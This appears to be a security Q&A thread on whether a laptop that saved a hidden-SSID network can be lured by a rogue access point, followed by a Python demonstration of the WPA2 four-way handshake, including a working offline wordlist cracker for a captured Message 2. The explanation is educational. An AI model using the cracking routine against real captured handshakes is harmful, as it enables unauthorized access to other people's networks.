2

This question deals with whether hiding an SSID makes a given wifi network more or less secure (short answer: neither). On the other hand, I think that a client that saves a connection to a network with a hidden SSID is opening itself up to a future man-in-the-middle attack.

Here's my scenario:

Alice connects to a hidden wifi network named 'Bob.' She saves the connection and sets it to connect automatically in the future.

Alice goes to the airport, turns on her laptop, and it starts searching for a hidden wifi network named 'Bob.' Malfoy is running a device that is listening for suckers like Alice who are broadcasting in search of a hidden wifi network. Malfoy's device responds to Alice's laptop saying, "Yep. I'm 'Bob'. And that password you've provided me, that'll do just fine. Here's your internet connection."

At this point, all Alice knows is that she's connected to the internet. She proceeds to browse the internet, while Malfoy sits in the middle stealing her info.

Now, if Alice is savvy, she'll realize that the 'Bob' network shouldn't be available at this airport and something's wrong. But that's a fair amount of burden to place on a user, especially a non-technical one.

So, is the above scenario theoretically possible? Is it practical? If it's not possible, what prevents it from happening?

mwolfe02
  • 123
  • 1
  • 6

2 Answers

3

The attack as you described it is not possible. This is the impossible part: "that password you've provided me, that'll do just fine". In the Wi-Fi protocol, the client doesn't send the password to the AP. Instead, both the client and AP derive an encryption key from it, and they mutually authenticate by making sure they can understand each other's messages.

  • Got it. Since the key is derived from a mathematically difficult calculation, the malicious server can't reverse engineer the original password. And without the original password, the server can't encrypt its own messages. I feel better now :) – mwolfe02 Jul 27 '18 at 12:51
  • Of course, all of this goes out the window if it's an open network, right? So it strikes me that the most dangerous wifi network one could connect to, then, is an open network with a hidden SSID. – mwolfe02 Jul 27 '18 at 12:53
  • The security comes from the infeasibility of recovering the key from the communications encrypted with it, not the infeasibility of recovering the password from the key. – Joseph Sible-Reinstate Monica Jul 27 '18 at 20:34
  • The "server" is called an Access Point (AP), or a "router" by my mom and possibly yours too. It's called a server only when it's an Enterprise Wi-Fi (RADIUS/authentication server), and your answer doesn't describe how authentication works; you can get the four-way handshake and derive the password from the example provided. Search for "AP-less WPA personal cracking". – Azteca Jul 28 '18 at 18:28
  • It's not really fair to call cracking a password "deriving" it from listening to the exchange. Also, with the exception of WPA3 (which basically nothing supports yet), cracking a password doesn't require a MITM, just passive listening. – Joseph Sible-Reinstate Monica Jul 29 '18 at 00:08
1

So, is the above scenario theoretically possible? Is it practical? If it's not possible, what prevents it from happening?

Absolutely, it's both possible and practical, but not exactly as you described it.

Hidden SSIDs don't play a role at all, since once the user saves the network, the station (STA, the laptop) needs to advertise that "hidden" network in its probe requests to see whether the (hidden) AP is listening for that probe request and will send a probe response back.

The part where you are wrong is this:

Malfoy's device responds to Alice's laptop saying, "Yep. I'm 'Bob'. And that password you've provided me, that'll do just fine."

Here's how it actually works:

When Malfoy sees a probe request for "Hidden Network", he'll proceed to create a false SSID (either hidden or not, it doesn't matter) of all types (WEP, WPA, WPA2, etc.).

Once Alice's STA sees "Hidden Network", it will start the connection process. Malfoy's fake AP will send Message 1 of the four-way handshake (4WH), carrying the ANonce. With this, Alice will create her own encryption key (PTK) and will send back her own nonce (SNonce) and the MIC in Message 2 to the AP. Now, we can't create the encryption key because we don't have the password, right? So the MIC won't match and the connection will fail from here on... but that's OK, we already have all we need to brute force the password as usual.

Here's the process illustrated on YouTube with your same scenario: a home access point (not hidden, since that doesn't matter once it's saved on the STA) and Alice being naive and all in the airport.

Azteca
  • 1,116
  • 7
  • 16
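The exchange both answers describe, as an added example that is not code from either answer or from any Wi-Fi stack: a WPA2-Personal station derives the PMK from the passphrase and SSID, expands it to a PTK with the two MAC addresses and the two nonces, and proves possession by putting a MIC on Message 2; the AP (or a rogue AP) can only check that MIC by deriving the same key. The frame layout follows the EAPOL-Key format but with an empty Key Data field, and the SSID, MAC addresses, nonces, passphrase and wordlist are constructed values, not captured traffic. The `if __name__` block shows the three outcomes the thread argues about: the honest AP accepts Alice's Message 2, Alice rejects a Message 3 forged by a rogue AP that guessed the wrong passphrase, and the rogue AP still recovers the passphrase offline from Message 2 if it is in its wordlist.

```python
"""WPA2-Personal four-way handshake, reduced to key derivation and the MIC check.

Added example, not code from the original page. Real EAPOL-Key layout with an
empty Key Data field; all values below are constructed, not captured traffic.
"""
import hashlib
import hmac

# Constructed demo values (assumptions, not captured data).
SSID = "Bob"
AA = bytes.fromhex("020000000001")     # authenticator (AP) MAC address
SPA = bytes.fromhex("020000000002")    # supplicant (Alice's laptop) MAC address
ANONCE = bytes(range(32))              # AP nonce, sent in the clear in Message 1
SNONCE = bytes(range(32, 64))          # STA nonce, sent in the clear in Message 2

KEY_INFO_M2 = 0x010A  # descriptor version 2 (HMAC-SHA1 MIC, AES), pairwise, MIC bit
KEY_INFO_M3 = 0x13CA  # as above plus install, ack, secure and encrypted-key-data bits

# Offsets inside the EAPOL-Key frame built below (4-byte EAPOL header comes first).
NONCE_OFFSET = 17
MIC_OFFSET = 81
FRAME_LEN = 99


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i), truncated."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of MACs || min/max of nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_key_frame(key_info: int, replay: int, nonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key frame (RSN descriptor) with an empty Key Data field."""
    body = (
        b"\x02"                        # descriptor type: RSN
        + key_info.to_bytes(2, "big")
        + (16).to_bytes(2, "big")      # key length (CCMP)
        + replay.to_bytes(8, "big")    # replay counter
        + nonce                        # 32-byte nonce
        + b"\x00" * 16                 # key IV
        + b"\x00" * 8                  # key RSC
        + b"\x00" * 8                  # reserved / key ID
        + mic                          # 16-byte MIC (zero while computing it)
        + (0).to_bytes(2, "big")       # key data length: nothing appended here
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type 3 (Key)


def compute_mic(kck: bytes, frame: bytes) -> bytes:
    """Descriptor version 2 MIC: HMAC-SHA1 over the frame with the MIC field zeroed, first 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def kck_for(passphrase, ssid, aa, spa, anonce, snonce) -> bytes:
    """Key Confirmation Key: the first 128 bits of the PTK."""
    return derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]


def build_signed_frame(passphrase, ssid, aa, spa, anonce, snonce, key_info, replay, nonce) -> bytes:
    """What an honest party sends: the frame carrying a MIC under the KCK it derived itself."""
    frame = eapol_key_frame(key_info, replay, nonce)
    mic = compute_mic(kck_for(passphrase, ssid, aa, spa, anonce, snonce), frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def verify_mic(passphrase, ssid, aa, spa, anonce, snonce, frame) -> bool:
    """What the receiver does: re-derive the KCK from the passphrase it knows and compare MICs."""
    expected = compute_mic(kck_for(passphrase, ssid, aa, spa, anonce, snonce), frame)
    return hmac.compare_digest(expected, frame[MIC_OFFSET:MIC_OFFSET + 16])


def offline_crack(wordlist, ssid, aa, spa, anonce, message2):
    """Rogue AP: it chose anonce itself and captured Message 2, whose SNonce is in the clear."""
    snonce = message2[NONCE_OFFSET:NONCE_OFFSET + 32]
    for guess in wordlist:
        if verify_mic(guess, ssid, aa, spa, anonce, snonce, message2):
            return guess
    return None


if __name__ == "__main__":
    real = "bobs-wifi-secret"   # constructed passphrase shared by Alice and the real 'Bob'
    m2 = build_signed_frame(real, SSID, AA, SPA, ANONCE, SNONCE, KEY_INFO_M2, 1, SNONCE)
    print("honest AP accepts Message 2:", verify_mic(real, SSID, AA, SPA, ANONCE, SNONCE, m2))
    forged_m3 = build_signed_frame("guess", SSID, AA, SPA, ANONCE, SNONCE, KEY_INFO_M3, 2, ANONCE)
    print("Alice accepts rogue Message 3:", verify_mic(real, SSID, AA, SPA, ANONCE, SNONCE, forged_m3))
    print("offline guess from Message 2:", offline_crack(["password", "letmein", real], SSID, AA, SPA, ANONCE, m2))
```

Nothing in Message 2 lets the rogue AP finish the handshake, which is the first answer's point: without the passphrase it cannot produce a Message 3 that Alice's MIC check accepts. What it does get is everything `offline_crack` needs, which is the second answer's point: it picked the ANonce, knows both MAC addresses, and reads the SNonce and the MIC straight out of the captured frame, so each guess costs only a PBKDF2 run (4096 iterations) plus a short PRF and HMAC. That is why passphrase strength is the whole defence for WPA2-Personal against a rogue AP, and why the thread's mention of WPA3 matters: its SAE handshake does not hand an offline-checkable value to whoever answers the probe.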